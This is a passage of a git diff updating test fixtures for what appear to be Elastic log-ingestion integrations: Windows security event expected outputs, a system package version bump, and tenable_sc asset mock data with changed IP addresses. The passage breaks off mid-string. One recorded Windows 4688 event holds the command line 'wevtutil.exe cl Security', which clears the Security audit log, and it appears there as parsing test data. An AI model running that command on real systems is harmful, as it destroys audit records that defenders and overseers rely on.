a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-10-08T10:20:44.472Z", "winlog": { "computer_name": "WIN-41OB2LO92CR", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.xml" - } - }, - "@timestamp": "2019-10-08T10:20:44.472Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "WIN-41OB2LO92CR$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2016_4799.xml" + } + }, "host": { "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.692317800Z", + "ingested": "2021-12-14T14:55:57.092273189Z", "code": "4799", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json index bab7d156087..81dfee19ad3 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.893129100Z", + "ingested": "2021-12-14T14:55:57.288953779Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -137,7 +137,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-12-09T13:46:03.893134600Z", + "ingested": "2021-12-14T14:55:57.288956364Z", "code": "4634", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json index abedc3063b1..a80d10d7f86 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4688-process-created.json-expected.json @@ -23,6 +23,7 @@ "executable": "C:\\Windows\\System32\\wevtutil.exe", "command_line": "\"C:\\Windows\\system32\\wevtutil.exe\" cl Security" }, + "@timestamp": "2019-11-14T17:10:15.151Z", "winlog": { "computer_name": "vagrant", "process": { @@ -62,13 +63,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4688_Process_Created.xml" - } - }, - "@timestamp": "2019-11-14T17:10:15.151Z", "ecs": { "version": "1.12.0" }, @@ -77,11 +71,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4688_Process_Created.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.226615400Z", + "ingested": "2021-12-14T14:55:57.625471463Z", "code": "4688", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json index cb2b04519a1..7945d4144b4 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2019-4689-process-exited.json-expected.json @@ -13,6 +13,7 @@ "pid": 5412, "executable": "C:\\Windows\\System32\\wevtutil.exe" }, + "@timestamp": "2019-11-14T21:26:49.496Z", "winlog": { "computer_name": "vagrant", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" - } - }, - "@timestamp": "2019-11-14T21:26:49.496Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.468666400Z", + "ingested": "2021-12-14T14:55:57.873260196Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -95,6 +95,7 @@ "pid": 3988, "executable": "C:\\Windows\\System32\\taskhostw.exe" }, + "@timestamp": "2019-11-14T21:27:46.960Z", "winlog": { "computer_name": "vagrant", "process": { @@ -126,13 +127,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" - } - }, - "@timestamp": "2019-11-14T21:27:46.960Z", "ecs": { "version": "1.12.0" }, @@ -141,11 +135,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.468674800Z", + "ingested": "2021-12-14T14:55:57.873283650Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -177,6 +177,7 @@ "pid": 2760, "executable": "C:\\Windows\\System32\\wevtutil.exe" }, + "@timestamp": "2019-11-14T21:28:18.460Z", "winlog": { "computer_name": "vagrant", "process": { @@ -208,13 +209,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" - } - }, - "@timestamp": "2019-11-14T21:28:18.460Z", "ecs": { "version": "1.12.0" }, @@ -223,11 +217,17 @@ "vagrant" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/security-windows2019_4689_Process_Exited.xml" + } + }, "host": { "name": "vagrant" }, "event": { - "ingested": "2021-12-09T13:46:04.468680700Z", + "ingested": "2021-12-14T14:55:57.873284179Z", "code": "4689", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json index 496acdd0433..748e2a9da7a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-unknown.json-expected.json @@ -24,7 +24,7 @@ "level": "information" }, "event": { - "ingested": "2021-12-09T13:46:04.990550600Z", + "ingested": "2021-12-14T14:55:58.391586406Z", "code": "65536", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/manifest.yml b/packages/system/manifest.yml index e74f1bc8d87..1a6cc171d49 100644 --- a/packages/system/manifest.yml +++ b/packages/system/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: system title: System -version: 1.6.5 +version: 1.6.6 license: basic description: Collect system logs and metrics from your servers with Elastic Agent. type: integration diff --git a/packages/tenable_sc/_dev/deploy/docker/files/config.yml b/packages/tenable_sc/_dev/deploy/docker/files/config.yml index 583727a82ec..08bfd295782 100644 --- a/packages/tenable_sc/_dev/deploy/docker/files/config.yml +++ b/packages/tenable_sc/_dev/deploy/docker/files/config.yml @@ -30,4 +30,4 @@ rules: responses: - status_code: 200 body: |- - {"type":"regular","response":{"totalRecords":"3","returnedRecords":3,"matchingDataElementCount":"15331999:613202:409055:920153:21:13389568:31379110","results":[{"ip":"0.0.228.153","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"0.1.103.207","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"0.1.119.220","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}}]},"error_code":0,"error_msg":"","warnings":[],"timestamp":1634560288} + {"type":"regular","response":{"totalRecords":"3","returnedRecords":3,"matchingDataElementCount":"15331999:613202:409055:920153:21:13389568:31379110","results":[{"ip":"89.160.20.156","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"89.160.20.156","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}},{"ip":"89.160.20.156","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}}]},"error_code":0,"error_msg":"","warnings":[],"timestamp":1634560288} diff --git a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log index dc9e57f21f4..72445492dfc 100644 --- a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log +++ b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log @@ -1,3 +1,3 @@ -{"ip":"0.0.228.153","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} -{"ip":"0.1.103.207","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example.com","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} -{"ip":"0.1.119.220","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example.co.in","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} \ No newline at end of file +{"ip":"89.160.20.156","uuid":"4add65d0-27fc-491c-91ba-3f498a61f49e","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:47:05:0d","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE","dnsName":"rnkmigauv2l8zeyf.example","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"9e8c4d43-982b-4405-a76c-d56c1d6cf117","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} +{"ip":"89.160.20.156","uuid":"f89a0aa7-5f35-4f05-9462-09c2b73b70ba","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:7d:34:48","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE","dnsName":"zder1ktdpso1p0ro.example.com","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8e0ab068-b851-4d1a-8a90-33afb6c5abb8","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} +{"ip":"89.160.20.156","uuid":"7113d6ed-f91a-4fe2-bb8b-e653d2570507","score":"307","total":"150","severityInfo":"131","severityLow":"0","severityMedium":"9","severityHigh":"4","severityCritical":"6","macAddress":"00:00:00:2b:1d:2e","policyName":"Basic Agent Scan","pluginSet":"201901281542","netbiosName":"UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE","dnsName":"g2ounzt879fe2djt.example.co.in","osCPE":"cpe:/o:microsoft:windows_10:::x64-home","biosGUID":"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a","tpmID":"","mcafeeGUID":"","lastAuthRun":"","lastUnauthRun":"","hostUniqueness":"repositoryID,ip,dnsName","uniqueness":"repositoryID,ip,dnsName","repository":{"id":"2","name":"Staged-Large","description":"","sciID":"1","dataFormat":"IPv4"}} \ No newline at end of file diff --git a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json index 4e4af8cb7ae..d3063cc500e 100644 --- a/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json +++ b/packages/tenable_sc/data_stream/asset/_dev/test/pipeline/test-asset.log-expected.json @@ -11,7 +11,7 @@ "UNKNOWN\\RNKMIGAUV2L8ZEYF.EXAMPLE" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ] }, "host": { @@ -21,7 +21,7 @@ "00-00-00-47-05-0D" ], "ip": [ - "0.0.228.153" + "89.160.20.156" ], "domain": "example" }, @@ -38,7 +38,7 @@ "bios": { "guid": "9e8c4d43-982b-4405-a76c-d56c1d6cf117" }, - "ip": "0.0.228.153", + "ip": "89.160.20.156", "dns": { "name": "rnkmigauv2l8zeyf.example" }, @@ -66,7 +66,7 @@ } }, "event": { - "original": "{\"ip\":\"0.0.228.153\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:47:05:0d\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", + "original": "{\"ip\":\"89.160.20.156\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:47:05:0d\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", "type": "info", "category": "host", "kind": "state" @@ -86,7 +86,7 @@ "UNKNOWN\\ZDER1KTDPSO1P0RO.EXAMPLE" ], "ip": [ - "0.1.103.207" + "89.160.20.156" ] }, "host": { @@ -96,7 +96,7 @@ "00-00-00-7D-34-48" ], "ip": [ - "0.1.103.207" + "89.160.20.156" ], "domain": "example.com" }, @@ -113,7 +113,7 @@ "bios": { "guid": "8e0ab068-b851-4d1a-8a90-33afb6c5abb8" }, - "ip": "0.1.103.207", + "ip": "89.160.20.156", "dns": { "name": "zder1ktdpso1p0ro.example.com" }, @@ -141,7 +141,7 @@ } }, "event": { - "original": "{\"ip\":\"0.1.103.207\",\"uuid\":\"f89a0aa7-5f35-4f05-9462-09c2b73b70ba\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:7d:34:48\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\ZDER1KTDPSO1P0RO.EXAMPLE\",\"dnsName\":\"zder1ktdpso1p0ro.example.com\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8e0ab068-b851-4d1a-8a90-33afb6c5abb8\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", + "original": "{\"ip\":\"89.160.20.156\",\"uuid\":\"f89a0aa7-5f35-4f05-9462-09c2b73b70ba\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:7d:34:48\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\ZDER1KTDPSO1P0RO.EXAMPLE\",\"dnsName\":\"zder1ktdpso1p0ro.example.com\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8e0ab068-b851-4d1a-8a90-33afb6c5abb8\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", "type": "info", "category": "host", "kind": "state" @@ -161,7 +161,7 @@ "UNKNOWN\\G2OUNZT879FE2DJT.EXAMPLE" ], "ip": [ - "0.1.119.220" + "89.160.20.156" ] }, "host": { @@ -171,7 +171,7 @@ "00-00-00-2B-1D-2E" ], "ip": [ - "0.1.119.220" + "89.160.20.156" ], "domain": "example.co.in" }, @@ -188,7 +188,7 @@ "bios": { "guid": "8b8a7f3e-d8d2-4728-a661-08dff6da5f1a" }, - "ip": "0.1.119.220", + "ip": "89.160.20.156", "dns": { "name": "g2ounzt879fe2djt.example.co.in" }, @@ -216,7 +216,7 @@ } }, "event": { - "original": "{\"ip\":\"0.1.119.220\",\"uuid\":\"7113d6ed-f91a-4fe2-bb8b-e653d2570507\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:2b:1d:2e\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\G2OUNZT879FE2DJT.EXAMPLE\",\"dnsName\":\"g2ounzt879fe2djt.example.co.in\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", + "original": "{\"ip\":\"89.160.20.156\",\"uuid\":\"7113d6ed-f91a-4fe2-bb8b-e653d2570507\",\"score\":\"307\",\"total\":\"150\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"severityHigh\":\"4\",\"severityCritical\":\"6\",\"macAddress\":\"00:00:00:2b:1d:2e\",\"policyName\":\"Basic Agent Scan\",\"pluginSet\":\"201901281542\",\"netbiosName\":\"UNKNOWN\\\\G2OUNZT879FE2DJT.EXAMPLE\",\"dnsName\":\"g2ounzt879fe2djt.example.co.in\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"biosGUID\":\"8b8a7f3e-d8d2-4728-a661-08dff6da5f1a\",\"tpmID\":\"\",\"mcafeeGUID\":\"\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"repository\":{\"id\":\"2\",\"name\":\"Staged-Large\",\"description\":\"\",\"sciID\":\"1\",\"dataFormat\":\"IPv4\"}}", "type": "info", "category": "host", "kind": "state" diff --git a/packages/tenable_sc/data_stream/asset/sample_event.json b/packages/tenable_sc/data_stream/asset/sample_event.json index dbcd0c16a18..12d6fd36da2 100644 --- a/packages/tenable_sc/data_stream/asset/sample_event.json +++ b/packages/tenable_sc/data_stream/asset/sample_event.json @@ -28,14 +28,14 @@ "dataset": "tenable_sc.asset", "ingested": "2021-12-09T09:09:52Z", "kind": "state", - "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"0.0.228.153\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent Scan\",\"repository\":{\"dataFormat\":\"IPv4\",\"description\":\"\",\"id\":\"2\",\"name\":\"Staged-Large\",\"sciID\":\"1\"},\"score\":\"307\",\"severityCritical\":\"6\",\"severityHigh\":\"4\",\"severityInfo\":\"131\",\"severityLow\":\"0\",\"severityMedium\":\"9\",\"total\":\"150\",\"tpmID\":\"\",\"uniqueness\":\"repositoryID,ip,dnsName\",\"uuid\":\"4add65d0-27fc-491c-91ba-3f498a61f49e\"}", + "original": "{\"biosGUID\":\"9e8c4d43-982b-4405-a76c-d56c1d6cf117\",\"dnsName\":\"rnkmigauv2l8zeyf.example\",\"hostUniqueness\":\"repositoryID,ip,dnsName\",\"ip\":\"89.160.20.156\",\"lastAuthRun\":\"\",\"lastUnauthRun\":\"\",\"macAddress\":\"00:00:00:47:05:0d\",\"mcafeeGUID\":\"\",\"netbiosName\":\"UNKNOWN\\\\RNKMIGAUV2L8ZEYF.EXAMPLE\",\"osCPE\":\"cpe:/o:microsoft:windows_10:::x64-home\",\"pluginSet\":\"201901281542\",\"policyName\":\"Basic Agent 